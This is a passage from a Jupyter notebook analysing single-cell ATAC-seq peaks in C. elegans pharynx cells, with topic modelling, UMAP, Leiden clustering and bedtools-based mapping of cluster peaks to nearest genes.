'')))\n else:\n gene_lists.sort(key=lambda x:os.path.basename(x).split('.')[0])\n gene_list_data = [(os.path.basename(path).split('.')[0], get_gene_data(path, expr_db, topn=topn)) for path in gene_lists]\n print('\\n'.join(['{!s} nearest genes: found {!s} out of {!s} total'.format(fname, data.shape[0], gene_list_len)\n for (fname, (data_idx, data, data_norm, gene_list_len, gene_weights)) in gene_list_data]))\n \n rs = numpy.random.RandomState(15321)\n random_subset = numpy.arange(expr_db.shape[0])\n rs.shuffle(random_subset)\n #num_to_select = int(numpy.mean([neuron_data.shape[0], emb_muscle_data.shape[0], l2_muscle_data.shape[0]]))\n num_to_select = len(random_subset)\n 
stage_db_subset = expr_db[random_subset[:num_to_select]][:,1:].astype(float)\n denom = numpy.sum(stage_db_subset, axis=1)[:,None] + 1e-8\n stage_db_norm = numpy.mean(stage_db_subset/denom, axis=0)\n print('Stage DB norm shape: {!s}'.format(stage_db_norm.shape))\n\n emb_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:] \n if elt.endswith('m') or elt == '4-cell']\n larva_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:] \n if elt.startswith('L')]\n adult_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:]\n if 'adult' in elt]\n dauer_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:]\n if 'dauer' in elt]\n# rest_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:] \n# if not elt.endswith('m') and not elt.startswith('L') and elt != '4-cell']\n\n pyplot.rcParams.update({'xtick.labelsize':20,\n 'ytick.labelsize':20,\n 'xtick.major.pad':8})\n\n ind = numpy.arange(len(expr_db_headers) - 1)\n width = 0.66\n axis_fontsize = 25\n title_fontsize = 27\n nrows = int(numpy.ceil(len(gene_list_data)/float(ncols)))\n fig, axes = pyplot.subplots(nrows=nrows, ncols=ncols, figsize=(7 * ncols, 7 * nrows), sharey=True)\n for idx, (fname, (data_idx, data, data_norm, gene_list_len, gene_weights)) in enumerate(gene_list_data):\n ax_idx = (idx//ncols, idx%ncols) if nrows > 1 else idx\n# to_plot = numpy.log2(numpy.mean(data_norm, axis=0)/stage_db_norm)\n if weights is True:\n to_plot = numpy.log2(numpy.average(data_norm, axis=0, weights=gene_weights)/stage_db_norm)\n else:\n to_plot = numpy.log2(numpy.average(data_norm, axis=0, weights=None)/stage_db_norm)\n axes[ax_idx].bar(ind[emb_idx], to_plot[emb_idx], width, color='orange', label='Embryo')\n axes[ax_idx].bar(ind[larva_idx], to_plot[larva_idx], width, color='blue', label='Larva')\n axes[ax_idx].bar(ind[adult_idx], to_plot[adult_idx], width, color='red', label='Adult')\n axes[ax_idx].bar(ind[dauer_idx], to_plot[dauer_idx], width, color='green', 
label='Dauer')\n# axes[ax_idx].bar(ind[rest_idx], to_plot[rest_idx], width, color='grey', label='Other')\n axes[ax_idx].axhline(0, color='k')\n axes[ax_idx].set_xlim((-1, len(expr_db_headers)))\n axes[ax_idx].set_title('{!s}\\n({!s} genes)\\n'.format(fname, data.shape[0]), fontsize=title_fontsize)\n axes[ax_idx].set_ylabel('Log2 Ratio of Mean Expr Proportion\\n(ATAC Targets:All Genes)', fontsize=axis_fontsize)\n axes[ax_idx].set_xlabel('Developmental Stage', fontsize=axis_fontsize)\n axes[ax_idx].set_xticks(ind + width/2)\n axes[ax_idx].set_xticklabels([])\n\n fig.tight_layout()\n\ndef leiden_clustering(umap_res, resolution_range=(0,1), random_state=2, kdtree_dist='euclidean'):\n tree = neighbors.KDTree(umap_res, metric=kdtree_dist)\n vals, i, j = [], [], []\n for idx in range(umap_res.shape[0]):\n dist, ind = tree.query([umap_res[idx]], k=25)\n vals.extend(list(dist.squeeze()))\n j.extend(list(ind.squeeze()))\n i.extend([idx] * len(ind.squeeze()))\n print(len(vals))\n ginput = sps.csc_matrix((numpy.array(vals), (numpy.array(i),numpy.array(j))), \n shape=(umap_res.shape[0], umap_res.shape[0]))\n sources, targets = ginput.nonzero()\n edgelist = zip(sources.tolist(), targets.tolist())\n G = ig.Graph(edges=list(edgelist))\n optimiser = leidenalg.Optimiser()\n optimiser.set_rng_seed(random_state)\n profile = optimiser.resolution_profile(G, leidenalg.CPMVertexPartition, resolution_range=resolution_range, number_iterations=0)\n print([len(elt) for elt in profile])\n return profile\n\ndef write_peaks_and_map_to_genes(data_array, row_headers, c_labels, out_dir, refseq_exon_bed, \n uniqueness_threshold=3, num_peaks=1000):\n #write the peaks present in each cluster to bed files\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n else:\n local['rm']('-r', out_dir)\n os.makedirs(out_dir)\n \n #write a file of peaks per cluster in bed format\n peak_files = []\n for idx, cluster_name in enumerate(sorted(set(c_labels))):\n cell_coords = numpy.where(c_labels == 
cluster_name)\n peak_sums = numpy.mean(data_array[:,cell_coords[0]], axis=1)\n peak_sort = numpy.argsort(peak_sums)\n# sorted_peaks = peak_sums[peak_sort]\n# print('Cluster {!s} -- Present Peaks: {!s}, '\n# 'Min Peaks/Cell: {!s}, '\n# 'Max Peaks/Cell: {!s}, '\n# 'Peaks in {!s}th cell: {!s}'.format(cluster_name, numpy.sum(peak_sums > 0), \n# sorted_peaks[0], sorted_peaks[-1], \n# num_peaks, sorted_peaks[-num_peaks]))\n out_tmp = os.path.join(out_dir, 'peaks{!s}.tmp.bed'.format(cluster_name))\n out_path = out_tmp.replace('.tmp', '')\n peak_indices = peak_sort[-num_peaks:]\n with open(out_tmp, 'w') as out:\n out.write('\\n'.join('chr'+'\\t'.join(elt) if not elt[0].startswith('chr') else '\\t'.join(elt) \n for elt in numpy.hstack([row_headers[peak_indices],\n peak_sums[peak_indices,None].astype(str)])) + '\\n')\n (local['sort']['-k1,1', '-k2,2n', out_tmp] > out_path)()\n os.remove(out_tmp)\n peak_files.append(out_path)\n\n bedtools, sort, cut, uniq, awk = local['bedtools'], local['sort'], local['cut'], local['uniq'], local['awk']\n out_subdir = os.path.join(out_dir, 'nearest_genes')\n if not os.path.isdir(out_subdir):\n os.makedirs(out_subdir)\n nearest_genes = []\n for path in sorted(peak_files):\n out_path = os.path.join(out_subdir, os.path.basename(path).replace('.bed', '.nearest_genes.txt'))\n cmd = (bedtools['closest', '-D', 'b', '-io', '-id', '-a', path, '-b', refseq_exon_bed] |\n cut['-f1,2,3,5,9,12'] | #fields are chrom, start, stop, peak sum, gene name, distance\n awk['BEGIN{OFS=\"\\t\"}{if($6 > -1200){print($1, $2, $3, $6, $5, $4);}}'] |\n sort['-k5,5', '-k6,6nr'] |\n cut['-f5,6'])()\n with open(out_path, 'w') as out:\n prev_gene = None\n for idx, line in enumerate(str(cmd).strip().split('\\n')):\n if prev_gene is None or not line.startswith(prev_gene):\n# print(line)\n line_split = line.strip().split()\n prev_gene = line_split[0]\n out.write(line + '\\n')\n nearest_genes.append(out_path)\n\n all_genes = []\n# for idx in range(len(nearest_genes)):\n# 
nearest_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes.txt'.format(idx))\n for nearest_genes_path in nearest_genes:\n with open(nearest_genes_path) as lines_in:\n all_genes.append([elt.strip().split() for elt in lines_in.readlines()])\n\n# count_dict = Counter([i[0] for i in itertools.chain(*[all_genes[elt] for elt in range(len(nearest_genes))])])\n count_dict = Counter([i[0] for i in itertools.chain(*all_genes)])\n #print unique genes\n for idx, nearest_genes_path in enumerate(nearest_genes):\n unique_genes = [elt for elt in all_genes[idx] if count_dict[elt[0]] < uniqueness_threshold]\n print(idx, len(unique_genes))\n# unique_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes_lt_{!s}.txt'.\n# format(idx, uniqueness_threshold))\n unique_genes_path = os.path.splitext(nearest_genes_path)[0] + '_lt_{!s}.txt'.format(uniqueness_threshold)\n with open(unique_genes_path, 'w') as out:\n out.write('\\n'.join(['\\t'.join(elt) for elt in unique_genes]) + '\\n')\n #print shared genes\n shared_genes_by_cluster = []\n all_genes = [dict([(k,float(v)) for k,v in elt]) for elt in all_genes]\n for gene_name in sorted(count_dict.keys()):\n if count_dict[gene_name] < uniqueness_threshold:\n continue\n shared_genes_by_cluster.append([gene_name])\n for cluster_dict in all_genes:\n shared_genes_by_cluster[-1].append(cluster_dict.get(gene_name, 0.0))\n shared_out = os.path.join(out_subdir, 'non-unique_genes_lt_{!s}.txt'.\n format(uniqueness_threshold))\n numpy.savetxt(shared_out, shared_genes_by_cluster, fmt='%s')\n# fmt=('%s',)+tuple('%18f' for _ in range(len(all_genes))))\n\n return\n\ndef write_peaks_and_map_to_genes2(data_array, peak_topic_specificity, row_headers, c_labels, out_dir, \n refseq_exon_bed, uniqueness_threshold=3, num_peaks=1000):\n# import pdb; pdb.set_trace()\n #write the peaks present in each cluster to bed files\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n else:\n local['rm']('-r', out_dir)\n os.makedirs(out_dir)\n \n #write a 
file of peaks per cluster in bed format\n peak_files = []\n for idx, cluster_name in enumerate(sorted(set(c_labels))):\n cell_coords = numpy.where(c_labels == cluster_name)\n peaks_present = numpy.sum(data_array[cell_coords[0],:], axis=0)\n out_tmp = os.path.join(out_dir, 'peaks{!s}.tmp.bed'.format(cluster_name))\n out_path = out_tmp.replace('.tmp', '')\n# peak_indices = peak_sort[-num_peaks:]\n peak_scores = (peak_topic_specificity ** 2) * peaks_present\n sort_idx = numpy.argsort(peak_scores[peaks_present.astype(bool)])\n peak_indices = sort_idx[-num_peaks:]\n with open(out_tmp, 'w') as out:\n# out.write('\\n'.join('chr'+'\\t'.join(elt) if not elt[0].startswith('chr') else '\\t'.join(elt) \n# for elt in numpy.hstack([row_headers[peaks_present.astype(bool)][peak_indices],\n# peak_scores[peaks_present.astype(bool)][peak_indices,None].astype(str)])) + '\\n')\n out.write('\\n'.join('\\t'.join(elt) for elt in \n numpy.hstack([row_headers[peaks_present.astype(bool)][peak_indices],\n peak_scores[peaks_present.astype(bool)][peak_indices,None].astype(str)])) + '\\n')\n (local['sort']['-k1,1', '-k2,2n', out_tmp] > out_path)()\n os.remove(out_tmp)\n peak_files.append(out_path)\n\n bedtools, sort, cut, uniq, awk = local['bedtools'], local['sort'], local['cut'], local['uniq'], local['awk']\n out_subdir = os.path.join(out_dir, 'nearest_genes')\n if not os.path.isdir(out_subdir):\n os.makedirs(out_subdir)\n nearest_genes = []\n for path in sorted(peak_files):\n out_path = os.path.join(out_subdir, os.path.basename(path).replace('.bed', '.nearest_genes.txt'))\n cmd = (bedtools['closest', '-D', 'b', '-io', '-id', '-a', path, '-b', refseq_exon_bed] |\n cut['-f1,2,3,5,9,12'] | #fields are chrom, start, stop, peak sum, gene name, distance\n awk['BEGIN{OFS=\"\\t\"}{if($6 > -1200){print($1, $2, $3, $6, $5, $4);}}'] |\n sort['-k5,5', '-k6,6nr'] |\n cut['-f5,6'])()\n with open(out_path, 'w') as out:\n prev_gene = None\n for idx, line in enumerate(str(cmd).strip().split('\\n')):\n if 
prev_gene is None or not line.startswith(prev_gene):\n# print(line)\n line_split = line.strip().split()\n prev_gene = line_split[0]\n out.write(line + '\\n')\n nearest_genes.append(out_path)\n\n all_genes = []\n# for idx in range(len(nearest_genes)):\n# nearest_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes.txt'.format(idx))\n for nearest_genes_path in nearest_genes:\n with open(nearest_genes_path) as lines_in:\n all_genes.append([elt.strip().split() for elt in lines_in.readlines()])\n\n# count_dict = Counter([i[0] for i in itertools.chain(*[all_genes[elt] for elt in range(len(nearest_genes))])])\n count_dict = Counter([i[0] for i in itertools.chain(*all_genes)])\n #print unique genes\n for idx, nearest_genes_path in enumerate(nearest_genes):\n unique_genes = [elt for elt in all_genes[idx] if count_dict[elt[0]] < uniqueness_threshold]\n print(idx, len(unique_genes))\n# unique_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes_lt_{!s}.txt'.\n# format(idx, uniqueness_threshold))\n unique_genes_path = os.path.splitext(nearest_genes_path)[0] + '_lt_{!s}.txt'.format(uniqueness_threshold)\n with open(unique_genes_path, 'w') as out:\n out.write('\\n'.join(['\\t'.join(elt) for elt in unique_genes]) + '\\n')\n #print shared genes\n shared_genes_by_cluster = []\n all_genes = [dict([(k,float(v)) for k,v in elt]) for elt in all_genes]\n for gene_name in sorted(count_dict.keys()):\n if count_dict[gene_name] < uniqueness_threshold:\n continue\n shared_genes_by_cluster.append([gene_name])\n for cluster_dict in all_genes:\n shared_genes_by_cluster[-1].append(cluster_dict.get(gene_name, 0.0))\n shared_out = os.path.join(out_subdir, 'non-unique_genes_lt_{!s}.txt'.\n format(uniqueness_threshold))\n numpy.savetxt(shared_out, shared_genes_by_cluster, fmt='%s')\n# fmt=('%s',)+tuple('%18f' for _ in range(len(all_genes))))\n\n return\n\ndef write_peaks_and_map_to_genes3(data_array, row_headers, c_labels, out_dir, \n refseq_exon_bed, uniqueness_threshold=3, 
num_peaks=1000):\n# import pdb; pdb.set_trace()\n #write the peaks present in each cluster to bed files\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n else:\n local['rm']('-r', out_dir)\n os.makedirs(out_dir)\n\n agg_clusters = numpy.vstack([numpy.sum(data_array[numpy.where(c_labels == cluster_idx)[0]], axis=0)\n for cluster_idx in sorted(set(c_labels))])\n tfidf = TfidfTransformer(norm='l2', use_idf=True, smooth_idf=True, sublinear_tf=False)\n agg_clusters_tfidf = tfidf.fit_transform(agg_clusters).toarray()\n\n #write a file of peaks per cluster in bed format\n peak_files = []\n for idx, cluster_name in enumerate(sorted(set(c_labels))):\n out_tmp = os.path.join(out_dir, 'peaks{!s}.tmp.bed'.format(cluster_name))\n out_path = out_tmp.replace('.tmp', '')\n sort_idx = numpy.argsort(agg_clusters_tfidf[idx])\n peak_indices = sort_idx[-num_peaks:]\n with open(out_tmp, 'w') as out:\n# out.write('\\n'.join('chr'+'\\t'.join(elt) if not elt[0].startswith('chr') else '\\t'.join(elt) \n# for elt in numpy.hstack([row_headers[peaks_present.astype(bool)][peak_indices],\n# peak_scores[peaks_present.astype(bool)][peak_indices,None].astype(str)])) + '\\n')\n out.write('\\n'.join('\\t'.join(elt) for elt in \n numpy.hstack([row_headers[peak_indices],\n agg_clusters_tfidf[idx][peak_indices,None].astype(str)])) + '\\n')\n (local['sort']['-k1,1', '-k2,2n', out_tmp] > out_path)()\n os.remove(out_tmp)\n peak_files.append(out_path)\n\n bedtools, sort, cut, uniq, awk = local['bedtools'], local['sort'], local['cut'], local['uniq'], local['awk']\n out_subdir = os.path.join(out_dir, 'nearest_genes')\n if not os.path.isdir(out_subdir):\n os.makedirs(out_subdir)\n nearest_genes = []\n for path in sorted(peak_files):\n out_path = os.path.join(out_subdir, os.path.basename(path).replace('.bed', '.nearest_genes.txt'))\n cmd = (bedtools['closest', '-D', 'b', '-io', '-id', '-a', path, '-b', refseq_exon_bed] |\n cut['-f1,2,3,5,9,12'] | #fields are chrom, start, stop, peak sum, gene name, 
distance\n awk['BEGIN{OFS=\"\\t\"}{if($6 > -1200){print($1, $2, $3, $6, $5, $4);}}'] |\n sort['-k5,5', '-k6,6nr'] |\n cut['-f5,6'])()\n with open(out_path, 'w') as out:\n prev_gene = None\n for idx, line in enumerate(str(cmd).strip().split('\\n')):\n if prev_gene is None or not line.startswith(prev_gene):\n# print(line)\n line_split = line.strip().split()\n prev_gene = line_split[0]\n out.write(line + '\\n')\n nearest_genes.append(out_path)\n\n all_genes = []\n# for idx in range(len(nearest_genes)):\n# nearest_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes.txt'.format(idx))\n for nearest_genes_path in nearest_genes:\n with open(nearest_genes_path) as lines_in:\n all_genes.append([elt.strip().split() for elt in lines_in.readlines()])\n\n# count_dict = Counter([i[0] for i in itertools.chain(*[all_genes[elt] for elt in range(len(nearest_genes))])])\n count_dict = Counter([i[0] for i in itertools.chain(*all_genes)])\n #print unique genes\n for idx, nearest_genes_path in enumerate(nearest_genes):\n unique_genes = [elt for elt in all_genes[idx] if count_dict[elt[0]] < uniqueness_threshold]\n print(idx, len(unique_genes))\n# unique_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes_lt_{!s}.txt'.\n# format(idx, uniqueness_threshold))\n unique_genes_path = os.path.splitext(nearest_genes_path)[0] + '_lt_{!s}.txt'.format(uniqueness_threshold)\n with open(unique_genes_path, 'w') as out:\n out.write('\\n'.join(['\\t'.join(elt) for elt in unique_genes]) + '\\n')\n #print shared genes\n shared_genes_by_cluster = []\n all_genes = [dict([(k,float(v)) for k,v in elt]) for elt in all_genes]\n for gene_name in sorted(count_dict.keys()):\n if count_dict[gene_name] < uniqueness_threshold:\n continue\n shared_genes_by_cluster.append([gene_name])\n for cluster_dict in all_genes:\n shared_genes_by_cluster[-1].append(cluster_dict.get(gene_name, 0.0))\n shared_out = os.path.join(out_subdir, 'non-unique_genes_lt_{!s}.txt'.\n format(uniqueness_threshold))\n 
numpy.savetxt(shared_out, shared_genes_by_cluster, fmt='%s')\n# fmt=('%s',)+tuple('%18f' for _ in range(len(all_genes))))\n\n return", "_____no_output_____" ] ], [ [ "## Peaks model", "_____no_output_____" ] ], [ [ "#read in sc peak table\npeaktable_path = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.bow'\npeak_data_sparse = numpy.loadtxt(peaktable_path, dtype=int, skiprows=3)\npeak_data = sps.csr_matrix((peak_data_sparse[:,2], (peak_data_sparse[:,0] - 1, peak_data_sparse[:,1] - 1)))\n\ncell_names_path = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.indextable.txt'\ncell_names = numpy.loadtxt(cell_names_path, dtype=object)[:,0]\n\npeak_names_path = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.extra_cols.bed'\npeak_row_headers = numpy.loadtxt(peak_names_path, dtype=object)\n#chr_regex = re.compile('[:-]')\npeak_row_headers = numpy.hstack([peak_row_headers, numpy.array(['name'] * peak_row_headers.shape[0])[:,None]])\nprint(peak_data.shape)\n\norig_peaktable_path = '../tissue_analysis/pharynx/pharynx_all_peaks.bow'\norig_peak_data_sparse = numpy.loadtxt(orig_peaktable_path, dtype=int, skiprows=3)\norig_peak_data = sps.csr_matrix((orig_peak_data_sparse[:,2], \n (orig_peak_data_sparse[:,0] - 1, orig_peak_data_sparse[:,1] - 1)))\n\norig_cell_names_path = '../tissue_analysis/pharynx/pharynx_all_peaks.zeros_filtered.indextable.txt'\norig_cell_names = numpy.loadtxt(orig_cell_names_path, dtype=object)[:,0]\n\norig_peak_names_path = '../tissue_analysis/pharynx/pharynx_all_peaks.zeros_filtered.bed'\norig_peak_row_headers = numpy.loadtxt(orig_peak_names_path, dtype=object)\n#chr_regex = re.compile('[:-]')\norig_peak_row_headers = numpy.hstack([orig_peak_row_headers, \n numpy.array(['name'] * orig_peak_row_headers.shape[0])[:,None]])\nprint(orig_peak_data.shape)\n\n#peak_binary = sps.csr_matrix((numpy.ones((peak_data_sparse.shape[0],)), \n# (peak_data_sparse[:,0], peak_data_sparse[:,1])))\n#print(peak_binary.shape)\n\n#make a cells x 
peaks array\npeak_data_array = peak_data.toarray().astype(numpy.int8)\nprint(peak_data_array.shape)\ndel(peak_data)\n\norig_peak_data_array = orig_peak_data.toarray().astype(numpy.int8)\nprint(orig_peak_data_array.shape)\ndel(orig_peak_data)", "(616, 8028)\n(616, 8693)\n(616, 8028)\n(616, 8693)\n" ], [ "cell_idx_map = [numpy.where(orig_cell_names == elt)[0][0] for elt in cell_names]\norig_peak_data_array_filtered = orig_peak_data_array[cell_idx_map]\nprint(orig_peak_data_array_filtered.shape)", "(616, 8693)\n" ], [ "numpy.median(numpy.sum(peak_data_array, axis=1))", "_____no_output_____" ], [ "numpy.median(numpy.sum(peak_data_array, axis=0))", "_____no_output_____" ], [ "numpy.max(peak_data_array)", "_____no_output_____" ] ], [ [ "## Analysis functions", "_____no_output_____" ] ], [ [ "REFDATA = 'ATAC_sequencing/2018_worm_atac/ref_data/WS235'\nrefseq_exon_bed = os.path.join(REFDATA, 'c_elegans.WS272.canonical_geneset.genes.common_names.sorted.bed.gz')\nimport gzip\nucsc = True if peak_row_headers[0][0].startswith('chr') else False\nwith gzip.open(refseq_exon_bed, 'rb') as lines_in:\n exon_locs = []\n for line in lines_in:\n line = line.decode()[3:].strip().split()\n if ucsc is True:\n line[0] = 'chr{!s}'.format(line[0])\n line[1] = int(line[1])\n line[2] = int(line[2])\n exon_locs.append(line)\n\ngene_locs = {}\nfor exon in exon_locs:\n gene_locs.setdefault(exon[3], []).append(exon)\nfor gene, locs in gene_locs.items():\n gene_locs[gene] = sorted(locs, key=lambda x:(x[1],x[2]))", "_____no_output_____" ], [ "class DistanceException(Exception):\n pass\nclass NoPeakException(Exception):\n pass\n\ndef get_closest_peaks(gene_name, row_headers, verbose=False, dist_threshold=1200, dist_excpt=False):\n gene_coord = gene_locs[gene_name][0] if gene_locs[gene_name][0][-1] == '+' else gene_locs[gene_name][-1]\n if verbose:\n print(gene_coord)\n if gene_coord[-1] == '+':\n try:\n nearest_peak = numpy.where(numpy.logical_and(row_headers[:,0] == gene_coord[0], \n 
row_headers[:,1].astype(int) <= gene_coord[1]))[0][-1]\n except IndexError:\n raise NoPeakException()\n alt_peak = nearest_peak - 1\n# peak_dist = numpy.absolute(gene_coord[1] - row_headers[[nearest_peak, alt_peak],1].astype(int))\n peak_dist = gene_coord[1] - row_headers[[nearest_peak, alt_peak],2].astype(int)\n if verbose:\n print(row_headers[[nearest_peak, alt_peak]])\n print(peak_dist)\n else:\n try:\n nearest_peak = numpy.where(numpy.logical_and(row_headers[:,0] == gene_coord[0], \n row_headers[:,2].astype(int) >= gene_coord[2]))[0][0]\n except IndexError:\n raise NoPeakException()\n alt_peak = nearest_peak + 1\n# peak_dist = numpy.absolute(gene_coord[2] - row_headers[[nearest_peak, alt_peak],2].astype(int))\n peak_dist = row_headers[[nearest_peak, alt_peak],1].astype(int) - gene_coord[2]\n if verbose:\n print(row_headers[[nearest_peak, alt_peak]])\n print(peak_dist)\n if peak_dist[0] > dist_threshold:\n msg = 'Warning: nearest peak to {!s} is far away! ({!s} bp)'.format(gene_name, peak_dist[0])\n if dist_excpt:\n raise DistanceException(msg)\n else:\n print(msg)\n return nearest_peak, alt_peak\n\ndef get_closest_peaks2(gene_name, row_headers, verbose=False, dist_threshold=1200, gene_end_threshold=100, dist_excpt=False):\n gene_coord = gene_locs[gene_name][0] if gene_locs[gene_name][0][-1] == '+' else gene_locs[gene_name][-1]\n# gene_coord = gene_locs[gene_name][0]\n# gene_coord[2] = gene_locs[gene_name][-1][2]\n if verbose:\n print(gene_coord)\n if gene_coord[-1] == '+':\n try: #same chromosome\n nearest_peaks = numpy.where(numpy.logical_and(row_headers[:,0] == gene_coord[0], \n #peak start is before gene stop\n #peak stop is after gene start - dist threshold and close to gene end\n numpy.logical_and(row_headers[:,1].astype(int) <= (gene_coord[2] + gene_end_threshold),\n row_headers[:,2].astype(int) >= (gene_coord[1] - dist_threshold))))[0]\n# numpy.logical_and(row_headers[:,2].astype(int) >= (gene_coord[1] - dist_threshold),\n# row_headers[:,2].astype(int) 
<= (gene_coord[2] + gene_end_threshold)))))[0]\n except IndexError:\n raise NoPeakException()\n# alt_peak = nearest_peak - 1\n# peak_dist = numpy.absolute(gene_coord[1] - row_headers[[nearest_peak, alt_peak],1].astype(int))\n peak_dist = gene_coord[1] - row_headers[nearest_peaks,1].astype(int)\n if verbose:\n print(row_headers[nearest_peaks])\n print(peak_dist)\n else:\n try:\n nearest_peaks = numpy.where(numpy.logical_and(row_headers[:,0] == gene_coord[0], \n numpy.logical_and(row_headers[:,2].astype(int) >= (gene_coord[1] - gene_end_threshold),\n row_headers[:,1].astype(int) <= (gene_coord[2] + dist_threshold))))[0]\n# numpy.logical_and(row_headers[:,1].astype(int) <= (gene_coord[2] + dist_threshold),\n# row_headers[:,1].astype(int) >= (gene_coord[1] - gene_end_threshold)))))[0]\n except IndexError:\n raise NoPeakException()\n# alt_peak = nearest_peak + 1\n# peak_dist = numpy.absolute(gene_coord[2] - row_headers[[nearest_peak, alt_peak],2].astype(int))\n peak_dist = row_headers[nearest_peaks,2].astype(int) - gene_coord[2]\n if verbose:\n print(row_headers[nearest_peaks])\n print(peak_dist)\n# if peak_dist[0] > dist_threshold:\n# msg = 'Warning: nearest peak to {!s} is far away! 
({!s} bp)'.format(gene_name, peak_dist[0])\n# if dist_excpt:\n# raise DistanceException(msg)\n# else:\n# print(msg)\n return nearest_peaks\n\ndef get_gene_cells(gene_name, row_headers, peak_data_array, **kwargs):\n nearest_peaks = get_closest_peaks2(gene_name, row_headers, **kwargs)\n cells_idx = numpy.any(peak_data_array[:,nearest_peaks], axis=1)\n return cells_idx\n\ndef get_gene_idx(gene_name, row_headers, peaktopic_frac, topic_prob_threshold=0.5, **kwargs):\n nearest_peak, alt_peak = get_closest_peaks(gene_name, row_headers, **kwargs)\n topic_idx = numpy.argsort(peaktopic_frac[nearest_peak])[::-1]\n num_to_get = numpy.where(numpy.cumsum(peaktopic_frac[nearest_peak][topic_idx]) > topic_prob_threshold)[0][0] + 1\n return nearest_peak, topic_idx[:num_to_get]\n\ndef get_gene_topn_topics(gene_name, row_headers, peaktopic_frac, ntopics=1, **kwargs):\n nearest_peak, alt_peak = get_closest_peaks(gene_name, row_headers, **kwargs)\n topic_idx = numpy.argsort(peaktopic_frac[nearest_peak])[::-1]\n return nearest_peak, topic_idx[:ntopics]", "_____no_output_____" ] ], [ [ "## Topic Mode", "_____no_output_____" ] ], [ [ "doctopic_path = '../tissue_analysis/pharynx/0000_topics5_alpha3.000_beta2000.000/topic_mode.theta'\ndoctopic_peaks = numpy.loadtxt(doctopic_path, delimiter=',', dtype=float)\nprint(doctopic_peaks.shape)\n\n#center and scale the topic values\n#col_means = numpy.mean(doctopic.T, axis=0)\n#doctopic_norm = doctopic.T - col_means\n#doctopic_norm = doctopic_norm / numpy.std(doctopic_norm, axis=0)\n#doctopic_norm = doctopic_norm.T\n#print(doctopic_norm.shape)\n\ncol_means = numpy.mean(doctopic_peaks.T, axis=0)\ndoctopic_peaks_norm = doctopic_peaks.T - col_means\nl2_for_norm = (doctopic_peaks_norm ** 2).sum(axis=0).flatten() ** 0.5\ndoctopic_peaks_norm /= l2_for_norm\ndoctopic_peaks_norm = doctopic_peaks_norm.T\nprint(doctopic_peaks_norm.shape)\n\ndoctopic_peaks_frac = (doctopic_peaks.T/doctopic_peaks.sum(axis=1).astype(float)).T\nprint(doctopic_peaks_frac.shape)", 
"(616, 5)\n(616, 5)\n(616, 5)\n" ], [ "peaktopic_path = '../tissue_analysis/pharynx/0000_topics5_alpha3.000_beta2000.000/topic_mode.wordTopic'\npeaktopic = numpy.loadtxt(peaktopic_path, delimiter=',', dtype=float)\nprint(peaktopic.shape)\n\n#center and scale the topic values\n#col_means = numpy.mean(doctopic.T, axis=0)\n#doctopic_norm = doctopic.T - col_means\n#doctopic_norm = doctopic_norm / numpy.std(doctopic_norm, axis=0)\n#doctopic_norm = doctopic_norm.T\n#print(doctopic_norm.shape)\n\nnonzero_idx = numpy.where(numpy.sum(peaktopic, axis=1) > 0)[0]\npeaktopic = peaktopic[nonzero_idx]\npeak_row_headers = peak_row_headers[nonzero_idx]\npeak_data_array = peak_data_array[:,nonzero_idx]\n\ncol_means = numpy.mean(peaktopic.T, axis=0)\npeaktopic_norm = peaktopic.T - col_means\nl2_for_norm = (peaktopic_norm ** 2).sum(axis=0).flatten() ** 0.5\npeaktopic_norm /= l2_for_norm\npeaktopic_norm = peaktopic_norm.T\nprint(peaktopic_norm.shape)\n\npeaktopic_frac = (peaktopic.T/peaktopic.sum(axis=1).astype(float)).T\nprint(peaktopic_frac.shape)", "(8028, 5)\n(8028, 5)\n(8028, 5)\n" ], [ "doctopic_peaks_umap3_obj = umap.UMAP(n_components=3, random_state=253)\ndoctopic_peaks_umap3_res = doctopic_peaks_umap3_obj.fit_transform(doctopic_peaks_norm)\nprint(doctopic_peaks_umap3_res.shape)", "src/anaconda/envs/python3_remake2/lib/python3.6/site-packages/umap/spectral.py:229: UserWarning: Embedding 2 connected components using meta-embedding (experimental)\n n_components\n" ], [ "doctopic_peaks_umap2_obj = umap.UMAP(n_components=2, n_neighbors=15, random_state=1)\ndoctopic_peaks_umap2_res = doctopic_peaks_umap2_obj.fit_transform(doctopic_peaks_norm)\nprint(doctopic_peaks_umap2_res.shape)", "src/anaconda/envs/python3_remake2/lib/python3.6/site-packages/umap/spectral.py:229: UserWarning: Embedding 2 connected components using meta-embedding (experimental)\n n_components\n" ], [ "ncols=4\nnrows = int(numpy.ceil(doctopic_peaks_frac.shape[1]/ncols))\nfig, axes = pyplot.subplots(nrows=nrows, 
